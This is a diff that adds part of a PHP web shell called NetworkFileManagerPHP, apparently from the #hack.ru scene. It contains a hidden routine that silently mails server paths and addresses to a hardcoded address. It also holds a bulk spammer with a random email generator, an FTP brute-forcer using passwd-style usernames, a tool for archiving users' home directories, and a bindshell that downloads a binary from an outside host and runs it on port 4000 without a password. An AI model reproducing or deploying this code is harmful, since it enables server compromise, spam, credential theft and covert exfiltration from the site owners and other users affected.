+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
